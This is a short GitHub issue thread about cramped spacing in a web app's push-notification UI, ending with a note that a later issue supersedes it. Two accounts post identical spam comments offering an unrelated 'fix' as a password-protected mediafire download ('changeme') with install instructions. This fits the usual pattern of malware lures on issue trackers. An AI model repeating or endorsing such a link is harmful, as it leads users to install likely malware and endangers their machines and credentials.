### ISSUE TITLE
Implement spacing for the UI for push notifications.

### ISSUE THREAD

**Issue by burtonator** [hicommonwealth/commonwealth#9092]
## Describe the bug

This is a big crammed...

![image](https://github.com/user-attachments/assets/43604c7c-e712-4d7e-ac6d-9f3fc6d439aa)

### Initial conditions

**Environment:** 

**Branch/Release version:** 

**Browser:** 

**Wallet:**

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by dillchen** [comment]
Superseded by #9093
